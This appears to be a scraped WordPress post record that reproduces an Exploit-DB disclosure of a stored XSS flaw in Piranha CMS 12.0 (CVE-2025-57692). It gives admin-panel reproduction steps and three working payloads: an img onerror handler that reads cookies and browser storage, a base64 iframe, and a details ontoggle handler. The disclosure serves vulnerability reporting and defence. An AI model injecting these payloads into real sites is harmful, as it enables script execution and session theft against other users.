{"id":38487,"date":"2026-02-02T03:55:15","date_gmt":"2026-02-02T03:55:15","guid":{"rendered":"http:\/\/localhost\/?p=38487"},"modified":"2026-02-02T03:55:15","modified_gmt":"2026-02-02T03:55:15","slug":"piranha-cms-120-stored-xss-in-text-block","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=38487","title":{"rendered":"Piranha CMS 12.0 – Stored XSS in Text Block_EDB-ID:52471"},"content":{"rendered":"

{“lastseen”:”2026-02-02T09:28:04″,”description”:”Exploit Title: Piranha CMS 12.0 – Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software Link:…”,”published”:”2026-02-02T00:00:00″,”modified”:”2026-02-02T00:00:00″,”type”:”exploitdb”,”title”:”Piranha CMS 12.0 – Stored XSS in Text Block”,”source”:””,”references”:””,”id”:”EDB-ID:52471″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57692″],”sourceData”:”# Exploit Title: Piranha CMS 12.0 – Stored Cross Site Scripting \\r\\n# Date: 2025-09-26\\r\\n# Exploit Author: Chidubem Chukwu (Terminal Venom)\\r\\n# LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9?\\r\\n# Vendor Homepage: https:\/\/piranhacms.org\\r\\n# Software Link: https:\/\/github.com\/PiranhaCMS\/piranha.core\/releases\/tag\/v12.0\\r\\n# Version: 12.0\\r\\n# Category: Web Application\\r\\n# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome \\r\\n# CVE: CVE-2025-57692\\r\\n# Privilege Level: authenticated user\\r\\n# Patched Version: Not available\\r\\n# Exploit link: https:\/\/github.com\/Saconyfx\/security-advisories\/blob\/main\/CVE-2025-57692\/advisory.md\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n## Reproduction Steps ##\\r\\n\\r\\nPiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via \/manager\/pages, enabling execution of arbitrary JavaScript in another user s browser.\\r\\n\\r\\nReproduction steps \\r\\n\\r\\n\\t1.\\tLog in to the Piranha admin panel at https:\/\/\\u003chost\\u003e\/manager\/login.\\r\\n\\r\\n\\t2.\\tNavigate to Pages.\\r\\n\\r\\n\\t3.\\tClick Add Page and choose Standard Page or Standard Archive.\\r\\n\\r\\n\\t4.\\tEnter a page title (e.g., XSS-Test).\\r\\n\\r\\n\\t5.\\tClick the [ + ] button and select Text under Content to add a Text block.\\r\\n\\r\\n\\t6.\\tIn the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted\/saved and will also execute for anyone who later accesses or previews the page.\\r\\n\\r\\nPayload A \\r\\n\\r\\n\\u003cimg src=\\”x\\” onerror=\\”\\r\\n alert(\\r\\n ‘Cookies: ‘ + document.cookie + ‘\\\\n’ +\\r\\n ‘LocalStorage: ‘ + JSON.stringify(localStorage) + ‘\\\\n’ +\\r\\n ‘SessionStorage: ‘ + JSON.stringify(sessionStorage) + ‘\\\\n’ +\\r\\n ‘URL: ‘ + window.location.href + ‘\\\\n’ +\\r\\n ‘User Agent: ‘ + navigator.userAgent + ‘\\\\n’ +\\r\\n ‘Time: ‘ + new Date().toLocaleString()\\r\\n )\\r\\n\\” \/\\u003e\\r\\n\\r\\nPayload B \u2014 iframe base64 \\r\\n\\r\\n\\u003ciframe src=\\”data:text\/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\”\\u003e\\u003c\/iframe\\u003e\\r\\n\\r\\nPayload C \u2014 details toggle (on-toggle alert)\\r\\n\\r\\n\\u003cdetails open ontoggle=alert(‘XSS’)\\u003eClick\\u003c\/details\\u003e\\r\\n\\r\\n\\t7.\\tClick Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).\\r\\n\\r\\n\\t8.\\tAnyone who accesses the page (or pastes the payload) will trigger the XSS.”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52471″,”cvss”:{“score”:6.8,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:U\/C:H\/I:L\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52471″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-02-02T09:28:04″,”description”:”Exploit Title: Piranha CMS 12.0 – Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,25,12,40,21,13,7,11,5],"class_list":["post-38487","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-68","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nPiranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=38487\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-02-02T09:28:04″,”description”:”Exploit Title: Piranha CMS 12.0 – Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=38487\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-02T03:55:15+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Piranha CMS 12.0 – Stored XSS in Text Block_EDB-ID:52471\",\"datePublished\":\"2026-02-02T03:55:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\"},\"wordCount\":592,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.8\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\",\"name\":\"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-02T03:55:15+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=38487\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=38487#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Piranha CMS 12.0 – Stored XSS in Text Block_EDB-ID:52471\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=38487","og_locale":"en_US","og_type":"article","og_title":"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem","og_description":"{“lastseen”:”2026-02-02T09:28:04″,”description”:”Exploit Title: Piranha CMS 12.0 – Stored Cross Site Scripting Date: 2025-09-26 Exploit Author: Chidubem Chukwu Terminal Venom LinkedIn : https:\/\/www.linkedin.com\/in\/chidubem-chukwu-20bb202a9? Vendor Homepage: https:\/\/piranhacms.org Software...","og_url":"https:\/\/zero.redgem.net\/?p=38487","og_site_name":"zero redgem","article_published_time":"2026-02-02T03:55:15+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=38487#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=38487"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Piranha CMS 12.0 – Stored XSS in Text Block_EDB-ID:52471","datePublished":"2026-02-02T03:55:15+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=38487"},"wordCount":592,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.8","exploit","exploitdb","MEDIUM","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=38487#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=38487","url":"https:\/\/zero.redgem.net\/?p=38487","name":"Piranha CMS 12.0 - Stored XSS in Text Block_EDB-ID:52471 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-02T03:55:15+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=38487#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=38487"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=38487#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Piranha CMS 12.0 – Stored XSS in Text Block_EDB-ID:52471"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=38487"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/38487\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=38487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=38487"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=38487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}